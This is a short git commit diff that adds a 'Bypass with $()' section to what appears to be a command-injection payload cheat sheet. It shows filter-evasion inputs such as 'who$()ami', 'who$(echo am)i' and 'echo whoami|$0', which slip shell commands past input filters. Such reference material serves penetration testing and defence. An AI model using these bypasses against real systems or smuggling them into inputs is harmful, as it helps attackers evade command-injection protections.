added new bypass

This commit is contained in:
xplo1t-sec 2022-03-30 03:13:18 -04:00
parent 89f0b93d43
commit 8a5e01f20d

View File

@ -18,6 +18,7 @@
* [Bypass with double quote](#bypass-with-double-quote) * [Bypass with double quote](#bypass-with-double-quote)
* [Bypass with backslash and slash](#bypass-with-backslash-and-slash) * [Bypass with backslash and slash](#bypass-with-backslash-and-slash)
* [Bypass with $@](#bypass-with-) * [Bypass with $@](#bypass-with-)
* [Bypass with $()](#bypass-with-$())
* [Bypass with variable expansion](#bypass-with-variable-expansion) * [Bypass with variable expansion](#bypass-with-variable-expansion)
* [Bypass with wildcards](#bypass-with-wildcards) * [Bypass with wildcards](#bypass-with-wildcards)
* [Challenge](#challenge) * [Challenge](#challenge)
@ -209,6 +210,12 @@ echo $0
echo whoami|$0 echo whoami|$0
``` ```
### Bypass with $()
```powershell
who$()ami
who$(echo am)i
```
#### Bypass with variable expansion #### Bypass with variable expansion
```powershell ```powershell